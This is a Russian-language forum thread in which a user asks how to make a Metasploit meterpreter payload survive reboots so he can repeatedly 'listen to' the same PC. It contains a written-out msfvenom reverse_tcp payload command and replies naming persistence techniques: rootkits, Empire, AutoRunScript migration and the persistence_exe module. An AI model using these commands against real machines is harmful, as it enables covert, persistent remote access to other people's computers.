• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Как создать payload который будет работать в режиме persistence ?

kravl

Green Team
19.08.2018
54
10
BIT
0
Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ?
Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый. Как это исправить ?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=хост LPORT=порт -f exe > ~/Payload.exe
 
Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ?
Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый. Как это исправить ?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=хост LPORT=порт -f exe > ~/Payload.exe
Тут смотря на что фантазии хватит. Например залить руткит или тот же рдесктоп настроить.
 
Тут смотря на что фантазии хватит. Например залить руткит или тот же рдесктоп настроить.
На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.
 
На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.
Ну пробей по модулям что-то типо persistense и всего такого. Или покури empire framework, он вроде как для этих целей.
 
  • Нравится
Реакции: kravl
На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.
Ну пробей по модулям что-то типо persistense и всего такого. Или покури empire framework, он вроде как для этих целей.

Ок,спасибо. Пойду изучать empire framework.
 
Отпишись по итогам как протестишь. Типо как работает и какие подводные.
В конечном итоге я пришел к тому, что мигрирую свою нагрузку в другой процесс через AutoRunScript.
Через команду mirgate не выходило, ибо сразу сессия закрывалась и был Таймаут.
 
Как вариант используйте модуль: post/windows/manage/persistence_exe
только если у вас нет прав, то используйте USER
 
  • Нравится
Реакции: Underwood
В конечном итоге я пришел к тому, что мигрирую свою нагрузку в другой процесс через AutoRunScript.
Через команду mirgate не выходило, ибо сразу сессия закрывалась и был Таймаут.
На сегодняшний день и AutoRunScript перестал работать...
Знает кто решение этой проблемы ?
 
На сегодняшний день и AutoRunScript перестал работать...
Знает кто решение этой проблемы ?
я выше указал решение..работает без проблем. причем даже после перезагрузки компа в отношении которого ведется тестирование.
 
  • Нравится
Реакции: kravl
я выше указал решение..работает без проблем. причем даже после перезагрузки компа в отношении которого ведется тестирование.
Где именно прописывать данный модуль ?

Где именно прописывать данный модуль ?
Извиняюсь за тупой вопрос я засыпал уже просто, закрывайте тему. Решено.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!